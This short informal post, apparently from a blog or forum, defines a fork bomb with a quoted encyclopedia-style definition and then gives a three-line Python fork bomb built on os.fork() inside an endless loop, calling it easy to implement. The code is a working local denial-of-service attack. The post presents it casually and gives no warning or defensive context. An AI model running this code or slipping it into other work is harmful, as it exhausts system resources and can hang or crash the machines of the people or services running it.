what is a fork bomb you might ask, well in computing "a fork bomb (also called rabbit virus or wabbit[1]) is a denial-of-service attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation."
implementing this in python is much easier than you think:
import os
while True:
os.fork()